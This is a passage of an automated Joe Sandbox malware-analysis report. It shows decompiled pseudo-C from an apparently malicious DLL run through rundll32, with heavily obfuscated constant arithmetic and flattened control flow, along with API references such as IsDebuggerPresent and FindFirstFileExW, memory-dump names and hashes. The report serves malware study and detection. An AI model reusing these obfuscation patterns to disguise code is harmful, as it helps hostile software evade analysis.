				_v28 = 0xce4d;
				_t123 = 0x68;
				_v28 = _v28 / _t123;
				_t124 = 0xf;
				_v28 = _v28 / _t124;
				_v28 = _v28 ^ 0x15eb9a2e;
				_v28 = _v28 ^ 0x15ebc86f;
				_v4 = 0x1911;
				_v4 = _v4 ^ 0x7b1b0330;
				_v4 = _v4 ^ 0x7b1b2d08;
				_v8 = 0x92f;
				_v8 = _v8 >> 0xb;
				_v8 = _v8 ^ 0x00005602;
				_t108 = E002185BA(_t124);
				_t144 = _a4;
				_t146 = _t108;
				_v36 = 0x94f3;
				_v36 = _v36 + 0xffff06f8;
				_v36 = _v36 | 0xf59d433d;
				_v36 = _v36 >> 0xe;
				_t148 = _t144 + 0x24;
				_v36 = _v36 ^ 0x0003ffff;
				_t120 = E0020E29C(_v16, _v24, _t144 + 0x24);
				_t110 =  *((intOrPtr*)(_t144 + 8));
				if(_t110 != _v36 && _t110 != _t146) {
					_t127 =  *((intOrPtr*)(_t144 + 0x18));
					if(_t127 != _v36 && _t127 != _t146) {
						_t145 = _a8;
						_t128 =  *_t145;
						if(E00218D05(_t128, _t120) == 0) {
							_push(_t128);
							_push(_t128);
							_t147 = E00208736(0x224);
							if(_t147 != 0) {
								_t95 = _t147 + 0xc; // 0xc
								E00206636(_t95, _v28, _v4, _v8, _t148);
								 *_t147 = _t120;
								 *((intOrPtr*)(_t147 + 0x220)) =  *_t145;
								 *_t145 = _t147;
							}
						}
					}
				}
				return 1;
			}

0x00218d1f
0x00218d28
0x00218d2f
0x00218d3f
0x00218d44
0x00218d4a
0x00218d52
0x00218d5a
0x00218d5f
0x00218d67
0x00218d6f
0x00218d77
0x00218d7f
0x00218d87
0x00218d8f
0x00218d97
0x00218d9f
0x00218da7
0x00218daf
0x00218db7
0x00218dbf
0x00218dc7
0x00218dd3
0x00218dd8
0x00218dde
0x00218de6
0x00218dee
0x00218dfa
0x00218dff
0x00218e09
0x00218e0c
0x00218e10
0x00218e18
0x00218e20
0x00218e28
0x00218e30
0x00218e38
0x00218e40
0x00218e45
0x00218e51
0x00218e56
0x00218e5a
0x00218e5c
0x00218e64
0x00218e6c
0x00218e74
0x00218e79
0x00218e7c
0x00218e92
0x00218e94
0x00218e9c
0x00218ea2
0x00218ea9
0x00218eaf
0x00218eb5
0x00218ebe
0x00218ecc
0x00218ecd
0x00218ed8
0x00218ede
0x00218ee5
0x00218ef0
0x00218ef5
0x00218efc
0x00218f02
0x00218f02
0x00218ede
0x00218ebe
0x00218ea9
0x00218f0e

Strings

/, xrefs: 00218E38
oMt, xrefs: 00218DA7
4A3, xrefs: 00218D5F
9*, xrefs: 00218D67

Memory Dump Source

Source File: 00000007.00000002.2087918184.0000000000201000.00000020.00000001.sdmp, Offset: 00200000, based on PE: true

Associated: 00000007.00000002.2087915544.0000000000200000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2087930443.000000000021C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_200000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: /$4A3$9*$oMt
API String ID: 0-1186868077
Opcode ID: 661624ab906ed40de6bb00755b8a4da712f0a88c1636091944c630c3755a9822
Instruction ID: 213769e1c7c5d86367ec2522857c478bee149e21ff7c4370e1ff3e18cd47ade3
Opcode Fuzzy Hash: 661624ab906ed40de6bb00755b8a4da712f0a88c1636091944c630c3755a9822
Instruction Fuzzy Hash: 205157716083429FD358CF25D48690BFBE2FBA8318F104A1CF49596260C7B4DA59CF86

Uniqueness

Uniqueness Score: -1.00%

Function 00202A30, Relevance: 5.1, Strings: 4, Instructions: 108
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00202A30(intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				char _v52;
				intOrPtr _v56;
				char _v60;
				char _v124;
				void* _t120;
				signed int _t130;
				signed int _t131;
				signed int _t132;
				intOrPtr _t146;

				_v12 = 0xa0d7;
				_v12 = _v12 + 0x7eb;
				_v12 = _v12 + 0xffff9690;
				_t130 = 0x70;
				_v12 = _v12 / _t130;
				_v12 = _v12 ^ 0x00005cb7;
				_v36 = 0xa6e2;
				_t131 = 0x7c;
				_t146 = _a4;
				_v36 = _v36 * 0x6c;
				_v36 = _v36 ^ 0x00462f2b;
				_v20 = 0xf5ce;
				_v20 = _v20 + 0xec5e;
				_v20 = _v20 | 0x882d1c6f;
				_v20 = _v20 ^ 0x882decee;
				_v8 = 0xef73;
				_v8 = _v8 * 0x50;
				_v8 = _v8 ^ 0x984778b6;
				_v8 = _v8 | 0x0acb781a;
				_v8 = _v8 ^ 0x9acfaccf;
				_v16 = 0xf20c;
				_t132 = 0x6d;
				_v16 = _v16 / _t131;
				_v16 = _v16 | 0x2a1cc570;
				_v16 = _v16 * 0x5c;
				_v16 = _v16 ^ 0x225769f1;
				_v28 = 0xd318;
				_v28 = _v28 / _t132;
				_v28 = _v28 ^ 0x955bcf9a;
				_v28 = _v28 ^ 0x955bcc47;
				_v40 = 0xc2b8;
				_v40 = _v40 + 0x609d;
				_v40 = _v40 ^ 0x00014342;
				_v24 = 0x21cc;
				_v24 = _v24 << 5;
				_v24 = _v24 << 0xa;
				_v24 = _v24 ^ 0x10e64576;
				_v48 = 0xc8ed;
				_v48 = _v48 + 0xffffe729;
				_v48 = _v48 ^ 0x00009812;
				_v32 = 0xdf82;
				_v32 = _v32 ^ 0xa0cf88d1;
				_v32 = _v32 >> 4;
				_v32 = _v32 ^ 0x0a0ce5c9;
				_v44 = 0xf2d1;
				_v44 = _v44 + 0x3831;
				_v44 = _v44 ^ 0x00011e20;
				_t120 =  *((intOrPtr*)(_t146 + 4))( *((intOrPtr*)(_t146 + 0x28)), 1, 0);
				_t149 = _t120;
				if(_t120 != 0) {
					E00212349(_v12, _v36, _v20, _v8, _t132);
					_v60 =  &_v124;
					_v56 = E0020F85D(_v16, _t149,  &_v52, _v28, _v40, _v24);
					 *((intOrPtr*)(_t146 + 4))( *((intOrPtr*)(_t146 + 0x28)), 0xa,  &_v60,  &_v124);
					E00212025(_v48, _v56, _v32, _v44);
				}
				return 0;
			}

0x00202a36
0x00202a3f
0x00202a46
0x00202a53
0x00202a58
0x00202a5d
0x00202a64
0x00202a6f
0x00202a72
0x00202a75
0x00202a78
0x00202a7f
0x00202a86
0x00202a8d
0x00202a94
0x00202a9b
0x00202aa6
0x00202aa9
0x00202ab0
0x00202ab7
0x00202abe
0x00202aca
0x00202acb
0x00202ad0
0x00202adf
0x00202ae2
0x00202ae9
0x00202af5
0x00202af8
0x00202aff
0x00202b06
0x00202b0d
0x00202b14
0x00202b1b
0x00202b22
0x00202b26
0x00202b2a
0x00202b31
0x00202b38
0x00202b3f
0x00202b46
0x00202b4d
0x00202b54
0x00202b58
0x00202b5f
0x00202b66
0x00202b6d
0x00202b77
0x00202b7a
0x00202b7c
0x00202b8f
0x00202b9d
0x00202bb2
0x00202bbe
0x00202bcd
0x00202bd3
0x00202bda

Strings

+/F, xrefs: 00202A78
^, xrefs: 00202A86
18, xrefs: 00202B66
s, xrefs: 00202A9B

Memory Dump Source

Source File: 00000007.00000002.2087918184.0000000000201000.00000020.00000001.sdmp, Offset: 00200000, based on PE: true

Associated: 00000007.00000002.2087915544.0000000000200000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2087930443.000000000021C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_200000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: +/F$18$^$s
API String ID: 0-1171060364
Opcode ID: 70d39a78e3ab786549318ccb702bdfc1bcc7dde35113822f4650e37c684f7d3d
Instruction ID: 8f3459c952256421e1766882c1fc9c992408df923322006549ecc6e3307324c2
Opcode Fuzzy Hash: 70d39a78e3ab786549318ccb702bdfc1bcc7dde35113822f4650e37c684f7d3d
Instruction Fuzzy Hash: A751F372D01309EBEF08CFE1C94A9DEBBB2FB08314F208159D511B62A0D7B96A55DF94

Uniqueness

Uniqueness Score: -1.00%

Function 100307F0, Relevance: 4.7, APIs: 3, Instructions: 205COMMON

Download Yara Rule

APIs

Part of subcall function 10023FB6: GetLastError.KERNEL32(?,7248FFF6,?,1000F7D4,7248FFF6,?,00000000,?,1000E78E,10042340,7248FFF6,00000000,00000000), ref: 10023FBB
Part of subcall function 10023FB6: SetLastError.KERNEL32(00000000,FFFFFFFF,000000FF,?,1000E78E,10042340,7248FFF6,00000000,00000000), ref: 10024059

Part of subcall function 10023FB6: _free.LIBCMT ref: 10024018
Part of subcall function 10023FB6: _free.LIBCMT ref: 1002404E

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 10030844
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 1003088E
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 10030954

Memory Dump Source

Source File: 00000007.00000002.2092135552.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2092131454.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092170469.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092178755.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2092184275.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: InfoLocale$ErrorLast_free
String ID:
API String ID: 3140898709-0
Opcode ID: 13de748c05b97822012b37be4217f8bf4a8ec62a71ff1104d81bc350713f3c11
Instruction ID: e33891a80eec16c603dc44fbbac949e3ee41790992ddc179ef950c9f40fc70ca
Opcode Fuzzy Hash: 13de748c05b97822012b37be4217f8bf4a8ec62a71ff1104d81bc350713f3c11
Instruction Fuzzy Hash: DC61A3719512179FEB1ACF28DD92BAAB3E8EF04342F11447AFD05CA186E774D941CB50

Uniqueness

Uniqueness Score: -1.00%

Function 100272AB, Relevance: 4.6, APIs: 3, Instructions: 132fileCOMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,?,00000000,?,00000000), ref: 10027346
FindNextFileW.KERNEL32(00000000,?), ref: 100273C4
FindClose.KERNEL32(00000000), ref: 10027406

Memory Dump Source

Source File: 00000007.00000002.2092135552.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2092131454.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092170469.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092178755.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2092184275.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: Find$File$CloseFirstNext
String ID:
API String ID: 3541575487-0
Opcode ID: 584debd9bdd979560db08173b8236b53a7293f403173a0c8924e0c781fc6f144
Instruction ID: 733ca08340b476a7a0ede7b5a0695072a433af0d21f20a010c77cdf0311fa954
Opcode Fuzzy Hash: 584debd9bdd979560db08173b8236b53a7293f403173a0c8924e0c781fc6f144
Instruction Fuzzy Hash: 91412A72900115AFDB24EF65ED89DABB7B9FB89354F814099F90DD3141EB309E80CB60

Uniqueness

Uniqueness Score: -1.00%

Function 1000E144, Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 1000E23C
SetUnhandledExceptionFilter.KERNEL32 ref: 1000E246
UnhandledExceptionFilter.KERNEL32(?), ref: 1000E253

Memory Dump Source

Source File: 00000007.00000002.2092135552.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2092131454.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092170469.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092178755.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2092184275.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 66bca6bf5f40b5c8aafd732f6b834b70bcdac2935f7d27f914a22653c0949b4d
Instruction ID: 5921ed57366bc2a97905c57a6575bd65bc59e8fc3f67e6b7d2a13807858a3588
Opcode Fuzzy Hash: 66bca6bf5f40b5c8aafd732f6b834b70bcdac2935f7d27f914a22653c0949b4d
Instruction Fuzzy Hash: 1931C4749012289BDB21DF64D989B8DBBB8FF18350F5041EAE50CA7251EB709F858F44

Uniqueness

Uniqueness Score: -1.00%

Function 1001065E, Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,1001065D,00000000,7248FFF6,?,00000000,?,1000E78E), ref: 10010680
TerminateProcess.KERNEL32(00000000,?,1001065D,00000000,7248FFF6,?,00000000,?,1000E78E), ref: 10010687
ExitProcess.KERNEL32 ref: 10010699

Memory Dump Source

Source File: 00000007.00000002.2092135552.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2092131454.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092170469.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092178755.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2092184275.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: dd72089d1d1540554cbd6dfcac94ad096089794e6a09164e6b1116331a8ccb41
Instruction ID: 7189f3a5cfa41052a58c3eb9bbc362c100aebb528aeb995cb62dcc9c85320567
Opcode Fuzzy Hash: dd72089d1d1540554cbd6dfcac94ad096089794e6a09164e6b1116331a8ccb41
Instruction Fuzzy Hash: E1E04631200248ABDB01EF10CE88A083BA9FBA2281B414415F905CA131CB75EC92CA94

Uniqueness

Uniqueness Score: -1.00%

Function 002173AC, Relevance: 4.0, Strings: 3, Instructions: 219
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E002173AC() {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				char _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _t194;
				intOrPtr _t196;
				intOrPtr _t199;
				intOrPtr _t202;
				intOrPtr _t204;
				intOrPtr _t205;
				signed int _t207;
				signed int _t208;
				signed int _t209;
				signed int _t210;
				void* _t238;
				char _t242;
				signed int* _t243;
				void* _t245;

				_t243 =  &_v108;
				_v24 = 0x44d5d8;
				_t205 = 0;
				_v20 = 0;
				_v40 = 0x23cf;
				_v40 = _v40 ^ 0xbe38916f;
				_v40 = _v40 ^ 0xbe38820d;
				_v108 = 0x2e00;
				_v108 = _v108 + 0xe6b6;
				_v108 = _v108 * 0x5d;
				_t238 = 0x219f160f;
				_t207 = 0xe;
				_v108 = _v108 / _t207;
				_v108 = _v108 ^ 0x000708e5;
				_v56 = 0xac50;
				_t208 = 0x74;
				_v56 = _v56 / _t208;
				_v56 = _v56 ^ 0x00005612;
				_v48 = 0xf915;
				_v48 = _v48 + 0xc201;
				_v48 = _v48 ^ 0x0001bde6;
				_v76 = 0xa4d1;
				_v76 = _v76 << 0xb;
				_v76 = _v76 + 0x2090;
				_v76 = _v76 ^ 0x0526efdc;
				_v104 = 0x1331;
				_v104 = _v104 ^ 0x9278d736;
				_v104 = _v104 << 0xf;
				_v104 = _v104 << 3;
				_v104 = _v104 ^ 0x101c0c8f;
				_v52 = 0x4912;
				_t209 = 0x53;
				_v52 = _v52 * 0x5f;
				_v52 = _v52 ^ 0x001b11ba;
				_v80 = 0x36f7;
				_v80 = _v80 | 0x0c78674c;
				_v80 = _v80 + 0xffff3df1;
				_v80 = _v80 ^ 0x0c77a943;
				_v84 = 0x9f3a;
				_v84 = _v84 << 8;
				_v84 = _v84 ^ 0x7966a269;
				_v84 = _v84 ^ 0x79f9b7a1;
				_v60 = 0xac57;
				_v60 = _v60 ^ 0x3fa2bf2a;
				_v60 = _v60 ^ 0x3fa276dc;
				_v88 = 0xe218;
				_v88 = _v88 | 0xea5468c5;
				_v88 = _v88 << 0x10;
				_v88 = _v88 ^ 0xeadd1cb3;
				_v64 = 0x6c6b;
				_v64 = _v64 + 0xffff53e7;
				_v64 = _v64 ^ 0xffffd13f;
				_v92 = 0x6a88;
				_v92 = _v92 >> 1;
				_v92 = _v92 ^ 0xe005aace;
				_v92 = _v92 ^ 0xe005a166;
				_v100 = 0xd6b9;
				_v100 = _v100 ^ 0x5f91bbd5;
				_v100 = _v100 ^ 0x5ce69075;
				_v100 = _v100 >> 0xf;
				_v100 = _v100 ^ 0x00003faf;
				_v44 = 0xc8e7;
				_v44 = _v44 / _t209;
				_v44 = _v44 ^ 0x00005627;
				_v72 = 0xdbaa;
				_t210 = 0x49;
				_v72 = _v72 / _t210;
				_v72 = _v72 | 0xff4e0ba5;
				_v72 = _v72 ^ 0xff4e47cb;
				_v68 = 0x962f;
				_v68 = _v68 >> 0xe;
				_v68 = _v68 << 4;
				_v68 = _v68 ^ 0x00006f62;
				_v96 = 0xef5c;
				_t211 = 0x44;
				_v96 = _v96 * 0x25;
				_v96 = _v96 / _t211;
				_v96 = _v96 << 1;
				_v96 = _v96 ^ 0x0001262b;
				_t237 = _v36;
				_t242 = _v36;
				goto L1;
				do {
					while(1) {
						L1:
						_t245 = _t238 - 0x219f160f;
						if(_t245 > 0) {
							break;
						}
						if(_t245 == 0) {
							_t238 = 0x2394b362;
							continue;
						}
						if(_t238 == 0x8b9146f) {
							E00219465(_v68, _t237, _v96);
							L23:
							return _t205;
						}
						if(_t238 == 0x93670d9) {
							_t194 = E0021340A(_v80,  &_v32, _v84,  &_v16);
							asm("sbb esi, esi");
							_pop(_t211);
							_t238 = ( ~_t194 & 0xf6f92468) + 0x24090f6a;
							continue;
						}
						if(_t238 == 0x155b4458) {
							_t196 = E002189D3(_t242, _v108,  &_v36, _v56);
							_t237 = _t196;
							_pop(_t211);
							if(_t196 == 0) {
								goto L23;
							}
							_t238 = 0x35a1dc77;
							continue;
						}
						if(_t238 != 0x1b0233d2) {
							goto L20;
						} else {
							_t199 =  *0x21ca2c; // 0x495cc8
							E00216128(_v60, _v88, _v12, _t199 + 0x230, _v64, _v92, _v8 + 1);
							_t202 =  *0x21ca2c; // 0x495cc8
							_t211 = _v16;
							_t243 =  &(_t243[5]);
							_t205 = 1;
							_t238 = 0x24090f6a;
							 *(_t202 + 0x450) = _v16;
							continue;
						}
					}
					if(_t238 == 0x2394b362) {
						_t242 = E0020F4D0(_t211);
						_t238 = 0x155b4458;
						goto L20;
					}
					if(_t238 == 0x24090f6a) {
						E0020F536(_v100, _v44, _v72, _v32);
						_pop(_t211);
						_t238 = 0x8b9146f;
						goto L1;
					}
					if(_t238 != 0x35a1dc77) {
						goto L20;
					}
					_t238 = 0x8b9146f;
					if(_v36 > 2) {
						_t211 = _v48;
						_t204 = E0020EA4C( *((intOrPtr*)(_t237 + 8)), _v76, _v104,  &_v28, _v52);
						_t243 =  &(_t243[4]);
						_v32 = _t204;
						if(_t204 != 0) {
							_t238 = 0x93670d9;
						}
					}
					goto L1;
					L20:
				} while (_t238 != 0x36620d3);
				goto L23;
			}

0x002173ac
0x002173af
0x002173ba
0x002173bc
0x002173c0
0x002173c8
0x002173d0
0x002173d8
0x002173e0
0x002173f2
0x002173f6
0x002173ff
0x00217404
0x0021740a
0x00217412
0x0021741e
0x00217423
0x00217429
0x00217431
0x00217439
0x00217441
0x00217449
0x00217451
0x00217456
0x0021745e
0x00217466
0x0021746e
0x00217476
0x0021747b
0x00217480
0x00217488
0x00217495
0x00217496
0x0021749a
0x002174a2
0x002174aa
0x002174b2
0x002174ba
0x002174c2
0x002174ca
0x002174cf
0x002174d7
0x002174df
0x002174e7
0x002174ef
0x002174f7
0x002174ff
0x00217507
0x0021750c
0x00217514
0x0021751c
0x00217524
0x0021752c
0x00217534
0x00217538
0x00217540
0x00217548
0x00217550
0x00217558
0x00217560
0x00217565
0x0021756d
0x0021757b
0x0021757f
0x00217587
0x00217597
0x0021759c
0x002175a2
0x002175aa
0x002175b2
0x002175ba
0x002175bf
0x002175c4
0x002175cc
0x002175d9
0x002175da
0x002175e4
0x002175e8
0x002175ec
0x002175f4
0x002175f8
0x002175f8
0x002175fc
0x002175fc
0x002175fc
0x002175fc
0x00217602
0x00000000
0x00000000
0x00217608
0x002176e2
0x00000000
0x002176e2
0x00217614
0x00217793
0x0021779c
0x002177a2
0x002177a2
0x00217620
0x002176c4
0x002176ce
0x002176d6
0x002176d7
0x00000000
0x002176d7
0x0021762c
0x00217698
0x0021769d
0x002176a0
0x002176a3
0x00000000
0x00000000
0x002176a9
0x00000000
0x002176a9
0x00217634
0x00000000
0x0021763a
0x00217648
0x00217662
0x00217667
0x0021766e
0x00217675
0x00217678
0x00217679
0x0021767e
0x00000000
0x0021767e
0x00217634
0x002176f2
0x00217774
0x00217776
0x00000000
0x00217776
0x002176fa
0x0021775a
0x00217760
0x00217761
0x00000000
0x00217761
0x00217702
0x00000000
0x00000000
0x00217709
0x0021770e
0x00217728
0x0021772c
0x00217731
0x00217734
0x0021773a
0x00217740
0x00217740
0x0021773a
0x00000000
0x0021777b
0x0021777b
0x00000000

Strings

bo, xrefs: 002175C4
\, xrefs: 002175CC
'V, xrefs: 0021757F

Memory Dump Source

Source File: 00000007.00000002.2087918184.0000000000201000.00000020.00000001.sdmp, Offset: 00200000, based on PE: true

Associated: 00000007.00000002.2087915544.0000000000200000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2087930443.000000000021C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_200000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: 'V$\$bo
API String ID: 0-4178943049
Opcode ID: 388c6399100d0c68461c2f0a51ac1e84e4d340df604e7f4973c0e610ab0c400c
Instruction ID: 2dd3399467017cde762c94281713f2d0c7320fbf19f644b5a8ebcb414f68834c
Opcode Fuzzy Hash: 388c6399100d0c68461c2f0a51ac1e84e4d340df604e7f4973c0e610ab0c400c
Instruction Fuzzy Hash: 42A1737151C3429FD358CF28C48940BFBF2FBD4718F50892DF995962A0C7B58A998F86

Uniqueness

Uniqueness Score: -1.00%

Function 002096CD, Relevance: 3.9, Strings: 3, Instructions: 191
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E002096CD(signed int* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8) {
				char _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				unsigned int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				unsigned int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				void* _t162;
				signed int _t179;
				void* _t192;
				signed int _t193;
				signed int _t194;
				signed int _t195;
				signed int _t196;
				signed int _t197;
				void* _t200;
				intOrPtr* _t222;
				signed int* _t223;
				signed int* _t226;

				_push(_a8);
				_t222 = _a4;
				_t223 = __ecx;
				_push(_t222);
				_push(__ecx);
				E0020602B(_t162);
				_v80 = 0xadf4;
				_t226 =  &(( &_v140)[4]);
				_t200 = 0xade8ac2;
				_t193 = 0x38;
				_v80 = _v80 / _t193;
				_v80 = _v80 ^ 0x00005e4d;
				_v88 = 0xd682;
				_v88 = _v88 ^ 0xf51d39be;
				_v88 = _v88 ^ 0xf51dab09;
				_v96 = 0x72b2;
				_v96 = _v96 ^ 0xfa4c809d;
				_v96 = _v96 ^ 0xfa4c99cb;
				_v116 = 0x90ca;
				_v116 = _v116 | 0x91d06c09;
				_v116 = _v116 ^ 0x5d2d7dc0;
				_v116 = _v116 ^ 0xccfdf140;
				_v124 = 0x94f4;
				_v124 = _v124 >> 9;
				_t194 = 0x7e;
				_v124 = _v124 / _t194;
				_v124 = _v124 >> 1;
				_v124 = _v124 ^ 0x00005a93;
				_v92 = 0xb2da;
				_v92 = _v92 >> 0xf;
				_v92 = _v92 ^ 0x00004526;
				_v132 = 0xfe39;
				_v132 = _v132 ^ 0x94a2bb32;
				_v132 = _v132 + 0xffff197d;
				_v132 = _v132 + 0xa385;
				_v132 = _v132 ^ 0x94a23d21;
				_v104 = 0xe4d2;
				_v104 = _v104 ^ 0x49cfaa80;
				_v104 = _v104 | 0x48b9e868;
				_v104 = _v104 ^ 0x49ffe136;
				_v112 = 0xb598;
				_v112 = _v112 ^ 0x0d96fbe5;
				_v112 = _v112 + 0x88b9;
				_v112 = _v112 ^ 0x0d96d484;
				_v136 = 0x3e03;
				_v136 = _v136 ^ 0x29ac334c;
				_v136 = _v136 >> 9;
				_v136 = _v136 << 8;
				_v136 = _v136 ^ 0x14d602a1;
				_v120 = 0xd3c3;
				_t195 = 0x26;
				_v120 = _v120 / _t195;
				_t196 = 0x3e;
				_v120 = _v120 * 0x17;
				_v120 = _v120 ^ 0x0000f1c0;
				_v140 = 0x72b1;
				_v140 = _v140 + 0xffffab40;
				_v140 = _v140 << 0xe;
				_v140 = _v140 / _t196;
				_v140 = _v140 ^ 0x001e8f72;
				_v128 = 0x9994;
				_v128 = _v128 + 0xffff8c6c;
				_v128 = _v128 + 0xa4f6;
				_t197 = 0x3d;
				_v128 = _v128 / _t197;
				_v128 = _v128 ^ 0x00001242;
				_v100 = 0x8258;
				_v100 = _v100 + 0xffff85b7;
				_v100 = _v100 * 0x51;
				_v100 = _v100 ^ 0x000280a1;
				_v84 = 0x5c44;
				_v84 = _v84 ^ 0x1285eccb;
				_v84 = _v84 ^ 0x12858e57;
				_v108 = 0x7f88;
				_v108 = _v108 | 0x4d438ffe;
				_v108 = _v108 + 0xffff02b4;
				_v108 = _v108 ^ 0x4d436acf;
				do {
					while(_t200 != 0xade8ac2) {
						if(_t200 == 0xeed9730) {
							_push(_t200);
							_push(_t200);
							_t179 = E00208736(_t223[1]);
							 *_t223 = _t179;
							__eflags = _t179;
							if(__eflags != 0) {
								_t200 = 0x173d5c4e;
								continue;
							}
						} else {
							if(_t200 == 0xffe2862) {
								E0021360F( &_v76, _v120, _v140,  *_t222, _v128);
								_t226 =  &(_t226[3]);
								_t200 = 0x220c9c88;
								continue;
							} else {
								if(_t200 == 0x173d5c4e) {
									E002150F2( &_v76, _v104, _v112, _v136, _t223);
									_t226 =  &(_t226[3]);
									_t200 = 0xffe2862;
									continue;
								} else {
									if(_t200 == 0x220c9c88) {
										E00207998(_v100, _v84, __eflags, _t222 + 4,  &_v76, _v108);
									} else {
										if(_t200 != 0x2d9f638c) {
											goto L13;
										} else {
											_t207 = _t222;
											_t223[1] = E00217A0F(_t222);
											_t192 = E002078A5(_t222, _t207, 0x1000, _t207, 0x400);
											_t226 =  &(_t226[4]);
											_t200 = 0xeed9730;
											_t223[1] = _t223[1] + _t192;
											continue;
										}
									}
								}
							}
						}
						L16:
						__eflags =  *_t223;
						_t161 =  *_t223 != 0;
						__eflags = _t161;
						return 0 | _t161;
					}
					 *_t223 = 0;
					_t200 = 0x2d9f638c;
					_t223[1] = 0;
					L13:
					__eflags = _t200 - 0x18ac994b;
				} while (__eflags != 0);
				goto L16;
			}

0x002096d7
0x002096de
0x002096e5
0x002096e7
0x002096e9
0x002096ea
0x002096ef
0x002096f7
0x00209700
0x00209707
0x0020970c
0x00209712
0x0020971a
0x00209722
0x0020972a
0x00209732
0x0020973a
0x00209742
0x0020974a
0x00209752
0x0020975a
0x00209762
0x0020976a
0x00209772
0x0020977b
0x00209780
0x00209786
0x0020978a
0x00209792
0x0020979a
0x0020979f
0x002097a7
0x002097af
0x002097b7
0x002097bf
0x002097c7
0x002097cf
0x002097d7
0x002097df
0x002097e7
0x002097ef
0x002097f7
0x002097ff
0x00209807
0x0020980f
0x00209817
0x0020981f
0x00209824
0x00209829
0x00209831
0x0020983d
0x00209842
0x0020984d
0x0020984e
0x00209852
0x0020985a
0x00209862
0x0020986a
0x00209875
0x00209879
0x00209883
0x00209890
0x00209898
0x002098a6
0x002098a9
0x002098ad
0x002098b5
0x002098bd
0x002098ca
0x002098ce
0x002098d6
0x002098de
0x002098e6
0x002098ee
0x002098f6
0x002098fe
0x00209906
0x00209910
0x00209910
0x00209922
0x002099d7
0x002099d8
0x002099dc
0x002099e1
0x002099e5
0x002099e7
0x002099e9
0x00000000
0x002099e9
0x00209928
0x0020992e
0x002099b9
0x002099be
0x002099c1
0x00000000
0x00209930
0x00209932
0x00209995
0x0020999a
0x0020999d
0x00000000
0x00209934
0x0020993a
0x00209a1d
0x00209940
0x00209946
0x00000000
0x0020994c
0x0020994c
0x00209953
0x00209972
0x00209977
0x0020997a
0x0020997f
0x00000000
0x0020997f
0x00209946
0x0020993a
0x00209932
0x0020992e
0x00209a26
0x00209a28
0x00209a2c
0x00209a2c
0x00209a36
0x00209a36
0x002099f0
0x002099f2
0x002099f7
